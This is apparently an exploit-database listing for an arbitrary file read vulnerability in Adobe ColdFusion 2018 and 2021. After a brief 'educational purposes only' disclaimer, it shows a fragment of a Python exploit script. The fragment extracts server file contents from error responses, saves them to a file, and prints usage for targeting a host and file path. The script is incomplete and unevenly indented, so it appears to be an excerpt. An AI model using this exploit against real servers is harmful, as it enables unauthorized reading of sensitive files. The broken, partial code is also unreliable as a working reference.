Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier arbitrary file read Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2024-03-11 | Type : webapps | Platform : multiple
This exploit / vulnerability, Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier arbitrary file read, is for educational purposes only; if you use it, you do so at your own risk!
if response.status_code in [404, 500] and splatter in response.text:
    file_data = response.text.split(splatter, 1)[0]
if file_data is None:
    raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')
print(file_data)
# Save the output to a file
output_file_name = 'output.txt'
with open(output_file_name, 'w') as output_file:
    output_file.write(file_data)
    print(f"The output saved to {output_file_name}")

if __name__ == "__main__":
    if not 3 <= len(sys.argv) <= 5:
        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
        sys.exit(1)